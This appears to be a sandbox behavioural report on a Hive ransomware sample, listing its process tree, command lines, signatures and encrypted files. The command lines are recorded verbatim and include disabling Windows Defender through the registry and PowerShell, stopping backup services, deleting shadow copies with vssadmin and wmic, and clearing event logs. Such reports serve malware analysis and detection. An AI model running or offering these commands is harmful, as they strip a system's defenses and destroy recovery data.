PID 1684 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1300 wrote to memory of 320 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1300 wrote to memory of 320 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1300 wrote to memory of 320 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1300 wrote to memory of 320 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 672 wrote to memory of 1256 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 672 wrote to memory of 1256 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 672 wrote to memory of 1256 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 672 wrote to memory of 1256 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1016 wrote to memory of 1676 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1016 wrote to memory of 1676 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1016 wrote to memory of 1676 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1016 wrote to memory of 1676 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1668 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1668 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1668 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1668 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1960 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1960 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1960 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1960 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1916 wrote to memory of 904 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1916 wrote to memory of 904 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1916 wrote to memory of 904 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1916 wrote to memory of 904 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 956 wrote to memory of 1212 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 956 wrote to memory of 1212 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 956 wrote to memory of 1212 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 956 wrote to memory of 1212 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1684 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1684 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1820 wrote to memory of 1120 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1820 wrote to memory of 1120 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1820 wrote to memory of 1120 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1820 wrote to memory of 1120 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe

"C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/1300-55-0x0000000000000000-mapping.dmp

memory/320-56-0x0000000000000000-mapping.dmp

memory/672-57-0x0000000000000000-mapping.dmp

memory/1256-58-0x0000000000000000-mapping.dmp

memory/1016-59-0x0000000000000000-mapping.dmp

memory/1676-60-0x0000000000000000-mapping.dmp

memory/1668-61-0x0000000000000000-mapping.dmp

memory/912-62-0x0000000000000000-mapping.dmp

memory/1960-63-0x0000000000000000-mapping.dmp

memory/1520-64-0x0000000000000000-mapping.dmp

memory/1916-65-0x0000000000000000-mapping.dmp

memory/904-66-0x0000000000000000-mapping.dmp

memory/956-67-0x0000000000000000-mapping.dmp

memory/1212-68-0x0000000000000000-mapping.dmp

memory/1820-69-0x0000000000000000-mapping.dmp

memory/1120-70-0x0000000000000000-mapping.dmp

memory/1892-71-0x0000000000000000-mapping.dmp

memory/992-72-0x0000000000000000-mapping.dmp

memory/1468-73-0x0000000000000000-mapping.dmp

memory/1908-74-0x0000000000000000-mapping.dmp

memory/604-75-0x0000000000000000-mapping.dmp

memory/1976-76-0x0000000000000000-mapping.dmp

memory/1720-77-0x0000000000000000-mapping.dmp

memory/648-78-0x0000000000000000-mapping.dmp

memory/1000-79-0x0000000000000000-mapping.dmp

memory/972-80-0x0000000000000000-mapping.dmp

memory/564-81-0x0000000000000000-mapping.dmp

memory/548-82-0x0000000000000000-mapping.dmp

memory/1816-83-0x0000000000000000-mapping.dmp

memory/904-84-0x0000000000000000-mapping.dmp

memory/1568-85-0x0000000000000000-mapping.dmp

memory/1068-86-0x0000000000000000-mapping.dmp

memory/1540-87-0x0000000000000000-mapping.dmp

memory/1604-88-0x0000000000000000-mapping.dmp

memory/1956-89-0x0000000000000000-mapping.dmp

memory/1688-90-0x0000000000000000-mapping.dmp

memory/1776-91-0x0000000000000000-mapping.dmp

memory/1724-92-0x0000000000000000-mapping.dmp

memory/1612-93-0x0000000000000000-mapping.dmp

memory/1280-94-0x0000000000000000-mapping.dmp

memory/1964-95-0x0000000000000000-mapping.dmp

memory/1048-96-0x0000000000000000-mapping.dmp

memory/1484-97-0x0000000000000000-mapping.dmp

memory/1052-98-0x0000000000000000-mapping.dmp

memory/1284-99-0x0000000000000000-mapping.dmp

memory/1952-100-0x0000000000000000-mapping.dmp

memory/1592-101-0x0000000000000000-mapping.dmp

memory/464-102-0x0000000000000000-mapping.dmp

memory/1676-103-0x0000000000000000-mapping.dmp

memory/1520-104-0x0000000000000000-mapping.dmp

memory/1060-105-0x0000000000000000-mapping.dmp

memory/1240-106-0x0000000000000000-mapping.dmp

memory/1696-107-0x0000000000000000-mapping.dmp

memory/2032-108-0x0000000000000000-mapping.dmp

memory/668-109-0x0000000000000000-mapping.dmp

memory/820-110-0x0000000000000000-mapping.dmp

memory/1896-111-0x0000000000000000-mapping.dmp

memory/888-112-0x0000000000000000-mapping.dmp

memory/1248-113-0x0000000000000000-mapping.dmp

memory/880-114-0x0000000000000000-mapping.dmp

memory/1588-115-0x0000000000000000-mapping.dmp

memory/1196-116-0x0000000000000000-mapping.dmp

memory/1768-117-0x0000000000000000-mapping.dmp

memory/2084-118-0x0000000000000000-mapping.dmp

memory/2140-119-0x0000000075AB1000-0x0000000075AB3000-memory.dmp

memory/2140-121-0x0000000001E41000-0x0000000001E42000-memory.dmp

memory/2140-120-0x0000000001E40000-0x0000000001E41000-memory.dmp

memory/2140-122-0x0000000001E42000-0x0000000001E44000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 1a9a7e46dcbe23ba2a08cdf7988f0364
SHA1 6a67cf6db4dc9e62148b00370370925d37688dbc
SHA256 1532737b72c2e42af33f063a7bcc4281344af8149dea138dd5f94e28270aa662
SHA512 b1ecd502147e91f58f2ba76e0dcb9391e73e4b3ba5da021a6960a165b30de47af04fef2f475135d23792aa0d104a146d0d71a630f5331ab407edb22070567a46

memory/2228-125-0x0000000002520000-0x000000000316A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 09:33

Reported

2022-01-13 09:38

Platform

win10-en-20211208

Max time kernel

167s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_dApl8Hq1txo0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_eHCp5trpU940.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ul-phn.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_W8njOOQxmck0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\SetStart.m4a.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_8ARPioWK2eY0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\chess.3mf C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\bg6_thumb.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\THMBNAIL.PNG.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_2mm_A7gTCvE0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\5px.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\11c.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\WideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ul-oob.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_edmT7npB6cQ0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Grace-ppd.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_VkxrP7ZZ27g0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Icon_Quality.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-80_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Popups\PerfectEarned.jpg C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-oob.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_50StK8FqG3s0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Edit.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tiles\pyramid.jpg C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
